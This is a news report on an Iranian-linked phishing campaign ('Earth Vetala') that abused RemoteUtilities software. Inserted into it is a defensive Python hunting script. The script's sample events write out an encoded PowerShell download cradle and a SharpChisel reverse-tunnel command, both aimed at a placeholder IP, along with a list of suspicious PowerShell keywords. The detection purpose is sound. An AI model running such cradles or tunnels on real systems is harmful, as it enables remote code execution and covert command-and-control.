
Iranian Hackers Using Remote Utilities Software to Spy On Its Targets
2021-03-08 04:15

The campaign, dubbed "Earth Vetala" by Trend Micro, expands on research published by Anomali last month, which found evidence of malicious activity aimed at UAE and Kuwait government agencies that abused the legitimate ScreenConnect remote management tool.

The cybersecurity firm linked the ongoing attacks with moderate confidence to a threat actor widely tracked as MuddyWater, an Iranian hacker group known for its offensives primarily against Middle Eastern nations.

Earth Vetala is said to have leveraged spear-phishing emails containing embedded links to a popular file-sharing service called Onehub to distribute malware that ranged from password dumping utilities to custom backdoors, before initiating communications with a command-and-control server to execute obfuscated PowerShell scripts.

The links themselves direct victims to a .ZIP file containing legitimate remote administration software developed by RemoteUtilities, which is capable of downloading and uploading files, capturing screenshots, browsing files and directories, and executing and terminating processes.

Noting that the tactics and techniques of the two campaigns, one distributing RemoteUtilities and the other ScreenConnect, are broadly similar, Trend Micro said the targets of the new wave of attacks are mainly organizations located in Azerbaijan, Bahrain, Israel, Saudi Arabia, and the UAE.

In one instance involving a compromised host in Saudi Arabia, the researchers found that the adversary unsuccessfully tried to configure SharpChisel, a C# wrapper for the TCP/UDP tunneling tool chisel, for C2 communications, before downloading a remote access tool, a credential stealer, and a PowerShell backdoor capable of executing arbitrary remote commands.
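The chain described above (a ZIP pulled from Onehub, obfuscated PowerShell, and an attempted chisel tunnel) maps onto a few cheap hunting checks. The following is an added example written for this page, not code from Trend Micro, Anomali or the Hacker News article: the telemetry events are constructed to mirror the chain, the IP 203.0.113.5 is from the documentation range, the Onehub URL path is invented, and the hunting logic relies only on documented behaviour (PowerShell's -EncodedCommand takes base64 of a UTF-16LE script; chisel's reverse tunnel is started with `client`).

```python
import base64
import re
from typing import Optional
from urllib.parse import urlparse


def _enc(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 of the script as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed sample telemetry (not from the article): one proxy entry and
# three process-creation events modelled on the campaign's tool chain.
SAMPLE_EVENTS = [
    {"type": "http", "host": "victim-pc1",
     "url": "https://onehub.com/files/invoice-2021.zip"},          # invented path
    {"type": "process", "host": "victim-pc1",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"type": "process", "host": "victim-pc1",
     "cmdline": "SharpChisel.exe client 203.0.113.5:8080 R:socks"},
    {"type": "process", "host": "victim-pc2",
     "cmdline": "powershell.exe -Command Get-Process"},            # benign control
]

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Strings typical of a PowerShell download cradle / in-memory loader.
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring",
                 "downloadfile", "frombase64string")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> list:
    """Return the list of hunting findings for one event (empty if nothing matched)."""
    findings = []
    if event["type"] == "http":
        u = urlparse(event["url"])
        if (u.hostname or "").lower().endswith("onehub.com") and u.path.lower().endswith(".zip"):
            findings.append("zip_from_onehub")
    elif event["type"] == "process":
        cmd = event["cmdline"]
        low = cmd.lower()
        if "powershell" in low:
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append("powershell_encoded_command")
                if any(k in decoded.lower() for k in SUSPICIOUS_PS):
                    findings.append("powershell_download_cradle")
        # chisel/SharpChisel reverse tunnels are started as "<binary> client <server> R:..."
        if "chisel" in low and " client " in low:
            findings.append("chisel_client_tunnel")
    return findings


def hunt(events) -> dict:
    """Group findings per host so a single host showing the whole chain stands out."""
    by_host = {}
    for ev in events:
        f = triage(ev)
        if f:
            by_host.setdefault(ev["host"], []).extend(f)
    return by_host


if __name__ == "__main__":
    for host, findings in hunt(SAMPLE_EVENTS).items():
        print(host, sorted(set(findings)))
```

Decoding the encoded command before matching matters: the base64 blob hides `IEX` and `DownloadString` from any rule that only looks at the raw command line, which is exactly what the "obfuscated PowerShell scripts" in the article rely on.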

"While it possesses remote access capabilities, the attackers seem to lack the expertise to use all of these tools correctly. This is unexpected since we believe this attack is connected to the MuddyWater threat actors - and in other connected campaigns, the attackers have shown higher levels of technical skill."


News URL

http://feedproxy.google.com/~r/TheHackersNews/~3/VcvoRto4QK0/iranian-hackers-using-remote-utilities.html